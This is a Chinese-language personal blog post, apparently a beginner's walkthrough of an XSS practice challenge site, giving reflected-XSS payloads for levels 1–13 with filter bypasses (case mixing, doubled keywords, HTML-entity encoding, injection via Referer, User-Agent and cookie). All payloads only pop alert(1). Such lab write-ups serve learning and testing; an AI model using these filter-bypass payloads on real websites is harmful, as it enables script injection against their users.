<!doctype html>
<html lang="en"><head><meta charset="utf-8"><meta name="generator" content="Hexo 4.2.1"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><meta name="keywords" content="[object Object]"><meta name="description" content="[toc]才学xss，也不知道从何学起，就先各种找平台刷题吧，我觉得刷题是一种可以较快熟悉xss的方式平台地址：http://test.ctf8.com/"><meta name="author" content="Katharsis"><title>xss从零开始之刷xss挑战 - Kath4rs1s</title><meta description="[toc]才学xss，也不知道从何学起，就先各种找平台刷题吧，我觉得刷题是一种可以较快熟悉xss的方式平台地址：http:&amp;#x2F;&amp;#x2F;test.ctf8.com&amp;#x2F;"><meta property="og:type" content="article"><meta property="og:title" content="xss从零开始之刷xss挑战"><meta property="og:url" content="http://yoursite.com/2020/09/29/xss-challenge-2/"><meta property="og:site_name" content="Katharsis"><meta property="og:description" content="[toc]才学xss，也不知道从何学起，就先各种找平台刷题吧，我觉得刷题是一种可以较快熟悉xss的方式平台地址：http:&amp;#x2F;&amp;#x2F;test.ctf8.com&amp;#x2F;"><meta property="og:locale" content="en_US"><meta property="article:published_time" content="2020-09-29T08:24:22.000Z"><meta property="article:modified_time" content="2020-10-08T09:40:11.688Z"><meta property="article:author" content="Katharsis"><meta property="article:tag" content="xss"><meta property="twitter:card" content="summary"><meta property="twitter:image" content="http://yoursite.com/img/avatar.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"http://yoursite.com/2020/09/29/xss-challenge-2/"},"headline":"xss从零开始之刷xss挑战","image":["http://yoursite.com/img/avatar.png"],"datePublished":"2020-09-29T08:24:22.000Z","dateModified":"2020-10-08T09:40:11.688Z","author":{"@type":"Person","name":"Katharsis"},"description":"[toc]才学xss，也不知道从何学起，就先各种找平台刷题吧，我觉得刷题是一种可以较快熟悉xss的方式平台地址：http:&#x2F;&#x2F;test.ctf8.com&#x2F;"}</script><link rel="alternative" href="/atom.xml" title="Kath4rs1s" type="application/atom+xml"><link rel="icon" href="/img/favicon.png"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/font-awesome/5.12.0/css/all.min.css"><link rel="stylesheet" href="https://fonts.loli.net/css?family=Ubuntu:400,600|Source+Code+Pro|Monda:300,300italic,400,400italic,700,700italic|Roboto Slab:300,300italic,400,400italic,700,700italic|Microsoft YaHei:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic&amp;amp;subset=latin,latin-ext|Inconsolata|Itim|Lobster.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/highlight.js/9.12.0/styles/atom-one-dark.min.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" defer></script><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/lightgallery/1.6.12/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/justifiedGallery/3.7.0/css/justifiedGallery.min.css"><!--!--><!--!--><script src="https://cdnjs.loli.net/ajax/libs/pace/1.0.2/pace.min.js"></script><link rel="stylesheet" href="/css/style.css"><script src="https://cdnjs.loli.net/ajax/libs/jquery/3.3.1/jquery.min.js"></script><script src="/js/globalUtils.js"></script></head><body class="is-3-column has-navbar-fixed-top"><nav class="navbar navbar-main is-fixed-top"><div class="container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/img/123456.png" alt="Kath4rs1s" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">首页</a><a class="navbar-item" href="/archives">归档</a><a class="navbar-item" href="/categories">分类</a><a class="navbar-item" href="/about">关于</a></div><div class="navbar-end"><a class="navbar-item is-hidden-tablet catalogue" title="Catalogue" href="javascript:;"><i class="fas fa-list-ul"></i></a><a class="navbar-item search" title="Search" href="javascript:;"><i class="fas fa-search"></i></a><a class="navbar-item" id="night-nav" title="Night Mode" href="javascript:;"><i class="fas fa-moon" id="night-icon"></i></a></div></div></div></nav><script type="text/javascript" src="/js/theme-setting.js"></script><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-9-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta size-small is-uppercase level is-mobile"><div class="level-left"><i class="far fa-calendar-plus"> </i>2020-09-29  <span class="level-item"><i class="far fa-clock"> </i>5 m  <i class="fas fa-pencil-alt"> </i>0.8 k</span><span class="level-item" id="busuanzi_container_page_pv"><i class="far fa-eye"></i>&nbsp;&nbsp;<span id="busuanzi_value_page_pv">0</span> visits</span></div></div><h1 class="title is-3 is-size-4-mobile">xss从零开始之刷xss挑战</h1><div class="content"><p>[toc]<br>才学xss，也不知道从何学起，就先各种找平台刷题吧，我觉得刷题是一种可以较快熟悉xss的方式<br>平台地址：<a href="http://test.ctf8.com/">http://test.ctf8.com/</a></p>
<a id="more"></a>
<h2 id="level-1"><a href="#level-1" class="headerlink" title="level 1"></a>level 1</h2><p>第一关很简单，反射型xss，get提交一个参数然后会在页面中显示出来，然后查看源代码可以构造出payload。<br>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;&#x2F;h2&gt;&lt;svg onload&#x3D;&#39;alert(1)&#39;&gt;</span><br><span class="line">test&quot;&gt;&lt;svg onload&#x3D;&#39;alert(1)&#39;&gt;</span><br></pre></td></tr></table></figure>
<p>好吧，我构造的是第一个payload，但不知道为什么第二个也可以，暂时看不懂，日后再来看吧</p>
<h2 id="level-2"><a href="#level-2" class="headerlink" title="level 2"></a>level 2</h2><p>这个和第一个一样，只不过这个在搜索框处，体现了很重要的一点，搜索处容易出现反射型xss。<br>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">test&quot;&gt;&lt;svg onload&#x3D;&#39;alert(1)&#39;&gt;</span><br></pre></td></tr></table></figure>

<h2 id="level-3"><a href="#level-3" class="headerlink" title="level 3"></a>level 3</h2><p>这道题把左右尖括号&lt;&gt;转换为html实体，想直接构造标签有点难度，所以在属性处构造，先闭合属性，然后构造新属性，基于事件弹窗。<br>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1&#39; onclick&#x3D;&#39;alert(1)&#39;&#39;</span><br><span class="line">1&#39; oninput&#x3D;alert&#96;1&#96; &#x2F;&#x2F;</span><br></pre></td></tr></table></figure>
<p>第一个是点击输入框时弹窗，第二个是在输入框输入时弹窗，括号可以用反引号代替。</p>
<h2 id="level-4"><a href="#level-4" class="headerlink" title="level 4"></a>level 4</h2><p>就是把第三题的单引号换成双引号就好了，<br>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1&quot; onclick&#x3D;&#39;alert(1)&#39;&quot;</span><br><span class="line">1&quot; onclick&#x3D;alert(1) &#x2F;&#x2F;</span><br></pre></td></tr></table></figure>

<h2 id="level-5"><a href="#level-5" class="headerlink" title="level 5"></a>level 5</h2><p>这里会把<br>on 替换为 <strong>o_n</strong><br>script 替换为 <strong>sc_ript</strong></p>
<p>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;&gt; &lt;a href&#x3D;&quot;javascript:alert(1)&quot;&gt;a&lt;&#x2F;a&gt;</span><br></pre></td></tr></table></figure>

<p>呃呃，练习到此结束了，在这里试payload，结果把我ip封了，挂代理也进不去，我也是无语，这不是练习平台吗。</p>
<p><img src="/images/xss-challenges2/20200929171022.png" alt=""></p>
<p>呃呃，挂了代理，换了个user-agent好了，又可以继续“攻击”他了。。。。。</p>
<h2 id="level-6"><a href="#level-6" class="headerlink" title="level 6"></a>level 6</h2><p>这里在level 5的基础上又增加了对属性名的过滤<br>src 替换为 <strong>sr_c</strong><br>href 替换为 <strong>hr_ef</strong><br>on 替换为 <strong>o_n</strong><br>但是只要大小写就可绕过</p>
<p>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&quot;&gt;&lt;a hRef&#x3D;javascript:alert(1)&gt;xss&lt;&#x2F;a&gt;</span><br><span class="line">&quot;&gt;&lt;image sRc&#x3D;1 Onerror&#x3D;alert(28)&gt;</span><br></pre></td></tr></table></figure>

<h2 id="level-7"><a href="#level-7" class="headerlink" title="level 7"></a>level 7</h2><p>这里会把on等字符替换为空，双写绕过即可</p>
<p>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1&quot; oonnclick&#x3D;alert(1)&gt;</span><br><span class="line">&quot;&gt; &lt;scscriptript&gt;alert&#96;xss&#96;&lt;&#x2F;scscriptript&gt; &#x2F;&#x2F;</span><br></pre></td></tr></table></figure>

<h2 id="level-8"><a href="#level-8" class="headerlink" title="level 8"></a>level 8</h2><p>对script有过滤<br>script 替换为 <strong>scr_ipt</strong><br>可以使用html编码，html解析时只会对属性中的值进行html解码，直接构造<code>&lt;scr&amp;#105;pt\&gt;</code>不会解码，但是构造<code>&lt;a href=&#39;javascr&amp;#105;pt:alert(1)&#39;&gt;</code>，会变成<code>&lt;a href=&#39;javascript:alert(1)&#39;&gt;</code>，十进制或者十六进制都可以，所以可以构造payload。</p>
<p>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">javascr&amp;#105;pt:alert(1)</span><br><span class="line">javasc&amp;#x72;ipt:alert&#96;1&#96;</span><br></pre></td></tr></table></figure>

<h2 id="level-9"><a href="#level-9" class="headerlink" title="level 9"></a>level 9</h2><p>这个限制又多了些，<br>链接中必须带有http://<br>script 替换为 scr_ipt<br>但是他没有规定http必须放在开头，所以可以使用注释的方式注释掉http</p>
<p>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">javascr&amp;#105;pt:alert(1)&#x2F;&#x2F;http:&#x2F;&#x2F;www.aaa.com</span><br></pre></td></tr></table></figure>

<h2 id="level-10"><a href="#level-10" class="headerlink" title="level 10"></a>level 10</h2><p>这关没有搜索框了，get参数提交尖括号&lt;&gt;会被转义，无法构造，但是查看源代码会发现有三个隐藏的输入框，把其中的type的类型由 <strong>hidden</strong> 改为 <strong>text</strong>，随便输入个值回车会发现多了三个参数，试了一下输入点在第三个参数 <strong>t_sort</strong><br>然后就很容易了</p>
<p>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">123&quot; onmouseover&#x3D;&#39;alert(1)&#39; type&#x3D;&quot;text</span><br></pre></td></tr></table></figure>

<h2 id="level-11"><a href="#level-11" class="headerlink" title="level 11"></a>level 11</h2><p>和上一关的payload一样，只不过这次注入点是在 HTTP Request Header 请求头的 Refer 字段</p>
<p>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">123&quot; onmouseover&#x3D;&#39;alert(1)&#39; type&#x3D;&quot;text</span><br></pre></td></tr></table></figure>

<h2 id="level-12"><a href="#level-12" class="headerlink" title="level 12"></a>level 12</h2><p>注入点在user-agent</p>
<h2 id="level-13"><a href="#level-13" class="headerlink" title="level 13"></a>level 13</h2><p>注入点在cookie</p>
</div><ul class="post-copyright"><li><strong>Post Title: </strong><a href="http://yoursite.com/2020/09/29/xss-challenge-2/">xss从零开始之刷xss挑战</a></li><li><strong>Post Author: </strong><a href="http://yoursite.com">Katharsis</a></li><li><strong>Post Link: </strong><a href="http://yoursite.com/2020/09/29/xss-challenge-2/">http://yoursite.com/2020/09/29/xss-challenge-2/</a></li><li><strong>Copyright Notice: </strong><span>All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" rel="external nofollow" target="_blank">CC BY-NC-SA 4.0</a> unless stating additionally.</span></li></ul><div><div class="recommend-post"><span class="is-size-6 has-text-grey has-mr-7"># Related Post</span><br><span>  1.<a class="is-size-6" href="/2020/10/08/php-security/" target="_blank">php安全小记（一）</a><br></span><span>  2.<a class="is-size-6" href="/2020/09/22/xss-game/" target="_blank">xss从零开始之刷xss-game</a><br></span><span>  3.<a class="is-size-6" href="/2020/09/17/xss-challenges/" target="_blank">xss从零开始之刷xss-quiz</a><br></span></div></div><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/social-share.js/1.0.16/css/share.min.css"><div class="social-share"></div><script src="https://cdnjs.loli.net/ajax/libs/social-share.js/1.0.16/js/social-share.min.js"></script></article></div><div class="card"><div class="card-content"><h3 class="menu-label has-text-centered">Like this article? Support the author with</h3><div class="buttons is-centered"></div></div></div><nav class="post-navigation mt-4 level is-mobile"><div class="level-start"><a class="article-nav-prev level level-item link-muted" href="/2020/10/03/alert-1-to-win/"><i class="level-item fas fa-chevron-left"></i><span class="level-item">alert(1)-to-win的payload与知识点总结</span></a></div><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2020/09/25/thinkphp6/"><span class="level-item">thinkphp6反序列化链</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><!--!--></div><div class="column column-left is-4-tablet is-4-desktop is-4-widescreen  order-1 is-sticky"><div class="card widget toc-scroll" id="toc"><div class="card-content"><div class="menu"><h3 class="menu-label">Catalogue</h3><ul class="menu-list toc"><li><a class="is-flex toc-item" id="toc-item-level-1" href="#level-1"><span>level 1</span></a></li><li><a class="is-flex toc-item" id="toc-item-level-2" href="#level-2"><span>level 2</span></a></li><li><a class="is-flex toc-item" id="toc-item-level-3" href="#level-3"><span>level 3</span></a></li><li><a class="is-flex toc-item" id="toc-item-level-4" href="#level-4"><span>level 4</span></a></li><li><a class="is-flex toc-item" id="toc-item-level-5" href="#level-5"><span>level 5</span></a></li><li><a class="is-flex toc-item" id="toc-item-level-6" href="#level-6"><span>level 6</span></a></li><li><a class="is-flex toc-item" id="toc-item-level-7" href="#level-7"><span>level 7</span></a></li><li><a class="is-flex toc-item" id="toc-item-level-8" href="#level-8"><span>level 8</span></a></li><li><a class="is-flex toc-item" id="toc-item-level-9" href="#level-9"><span>level 9</span></a></li><li><a class="is-flex toc-item" id="toc-item-level-10" href="#level-10"><span>level 10</span></a></li><li><a class="is-flex toc-item" id="toc-item-level-11" href="#level-11"><span>level 11</span></a></li><li><a class="is-flex toc-item" id="toc-item-level-12" href="#level-12"><span>level 12</span></a></li><li><a class="is-flex toc-item" id="toc-item-level-13" href="#level-13"><span>level 13</span></a></li></ul></div></div><script type="text/javascript" async>
        $(document).ready(function () { //参考自 https://github.com/ppoffice/hexo-theme-icarus/pull/616/files
            var observerTopMargin;
            var scrollObserver;
            var headerElems = $(".headerlink");
            var activeTocItem;
        
            function initIntersectionObserver(docHeight) {
                observerTopMargin = docHeight;
                scrollObserver = new IntersectionObserver(scrollCallBack,
                    {
                        root: null,  // viewpoint
                        rootMargin: docHeight + "px 0px -80% 0px"  // cover top 30% of viewport to the top of document
                    })
            }
        
            function scrollCallBack(entries, observer) {
                if ($(window).scrollTop() > observerTopMargin * 0.7) { 
                    // User somehow scroll to 70% of observerTopMargin (which is inited as 200% document height)
                    // Observer top margin need to extend to cover all the space to the top of the document
                    initIntersectionObserver(observerTopMargin * 2)
                    observer.disconnect();
                    return;
                }
                let toActive;
                if (entries[0].intersectionRatio == 1) {  // enter viewed area
                    let entry = entries.reduce((u, v) => (u.target.toc_id > v.target.toc_id ? u : v));  // get the lowest item
                    toActive = $("#toc-item-" + $(entry.target).attr("href").substr(1));
                } else {
                    let entry = entries.reduce((u, v) => (u.target.toc_id < v.target.toc_id ? u : v));  // get the highest item
                    let idx = Math.max(entry.target.toc_id - 1, 0);
                    toActive = $("#toc-item-" + $(headerElems[idx]).attr("href").substr(1));
                }
                if (activeTocItem) activeTocItem.removeClass("is-current");
                activeTocItem = toActive
                activeTocItem.addClass("is-current");
            }
        
            initIntersectionObserver($(document).height() * 2);
            headerElems.each(function (index, obj) {
                obj.toc_id = index;
                scrollObserver.observe(obj);
            })
        });</script></div><div class="card widget"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="" src="/img/avatar.png" alt="Katharsis"></figure><p class="title is-size-4 is-block line-height-inherit">Katharsis</p><p class="is-size-6 is-block">^_^</p><p class="is-size-6 is-flex justify-content-center"><i class="fas fa-map-marker-alt mr-1"></i><span>中国</span></p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">Posts</p><a href="/archives"><p class="title">23</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">Categories</p><a href="/categories"><p class="title">6</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">Tags</p><a href="/tags"><p class="title">5</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="/" target="_blank" rel="noopener">Follow</a></div><div class="level is-mobile"><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="Github" href="/null"><i></i></a><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="Weibo" href="/null"><i></i></a><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="Email" href="/null"><i></i></a><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="Next" href="/null"><i></i></a><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="RSS" href="/null"><i></i></a></div></div></div></div></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/"><img src="/img/123456.png" alt="Kath4rs1s" height="28"></a><p class="size-small"><span>&copy; 2020 Katharsis</span>  Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank">Icarus</a>,Modify by <a href="https://github.com/removeif/hexo-theme-amazing" target="_blank">removeif</a> <br><span>© 版权说明：[本网站所有内容均收集于互联网或自己创作,<br />&nbsp;&nbsp;&nbsp;&nbsp;方便于网友与自己学习交流，如有侵权，请<a href="/message" target="_blank">留言</a>，立即处理]<br /></span><span><span id="statistic-times">loading...</span><script>function createTime(time) {
            var n = new Date(time);
            now.setTime(now.getTime() + 250),
                days = (now - n) / 1e3 / 60 / 60 / 24,
                dnum = Math.floor(days),
                hours = (now - n) / 1e3 / 60 / 60 - 24 * dnum,
                hnum = Math.floor(hours),
            1 == String(hnum).length && (hnum = "0" + hnum),
                minutes = (now - n) / 1e3 / 60 - 1440 * dnum - 60 * hnum,
                mnum = Math.floor(minutes),
            1 == String(mnum).length && (mnum = "0" + mnum),
                seconds = (now - n) / 1e3 - 86400 * dnum - 3600 * hnum - 60 * mnum,
                snum = Math.round(seconds),
            1 == String(snum).length && (snum = "0" + snum),
                document.getElementById("statistic-times").innerHTML = "❤️Site from <strong>"+time.split(" ")[0].replace(/\//g,".")+"</strong> has existed <strong>" + dnum + "</strong> d <strong>" + hnum + "</strong> h <strong>" + mnum + "</strong> m <strong>" + snum + "</strong> s！❤️";
        }var now = new Date();setInterval("createTime('2020/7/11 00:00:00')", 250,"");</script><br></span><div class="size-small"><span>❤️Thx <strong><span id="busuanzi_value_site_uv">99+</span></strong> users <strong><span id="busuanzi_value_site_pv">99+</span></strong> visited！❤️</span></div></p></div><div class="level-end"><div class="sideMusic"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/aplayer/dist/APlayer.min.css"><script src="/js/APlayer.min.js"></script><script src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script><meting-js style="width: auto;height: 2000px;" server="netease" type="playlist" id="4978492128" theme="#2980b9" loop="all" autoplay="false" order="list" storageName="aplayer-setting" lrctype="0" list-max-height="400px" fixed="true"></meting-js></div></div></div></div></footer><script src="https://cdnjs.loli.net/ajax/libs/moment.js/2.22.2/moment-with-locales.min.js"></script><script>moment.locale("en");</script><script>var IcarusThemeSettings = {
            site: {
                url: 'http://yoursite.com',
                external_link: {"enable":true,"exclude":[]}
            },
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script src="https://cdnjs.loli.net/ajax/libs/clipboard.js/2.0.4/clipboard.min.js" defer></script><script src="/js/animation.js"></script><a id="back-to-top" title="Back to Top" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script src="/js/back-to-top.js" defer></script><!--!--><!--!--><script src="https://cdnjs.loli.net/ajax/libs/lightgallery/1.6.12/js/lightgallery-all.min.js" defer></script><script src="https://cdnjs.loli.net/ajax/libs/justifiedGallery/3.7.0/js/jquery.justifiedGallery.min.js" defer></script><!--!--><!--!--><!--!--><script src="/js/toc.js" defer></script><script src="/js/main.js" defer></script><link rel="stylesheet" href="/css/insight.css"><div class="searchbox ins-search"><div class="searchbox-container ins-search-container"><div class="searchbox-input-wrapper"><input class="searchbox-input ins-search-input" type="text" placeholder="Type something..."><span class="searchbox-close ins-close ins-selectable"><i class="fa fa-times-circle"></i></span></div><div class="searchbox-result-wrapper ins-section-wrapper"><div class="ins-section-container"></div></div></div></div><script>(function (window) {
            var INSIGHT_CONFIG = {
                TRANSLATION: {
                    POSTS: 'Posts',
                    PAGES: 'Pages',
                    CATEGORIES: 'Categories',
                    TAGS: 'Tags',
                    UNTITLED: '(Untitled)',
                },
                CONTENT_URL: '/content.json',
            };
            window.INSIGHT_CONFIG = INSIGHT_CONFIG;
        })(window);</script><script src="/js/insight.js" defer></script></body></html>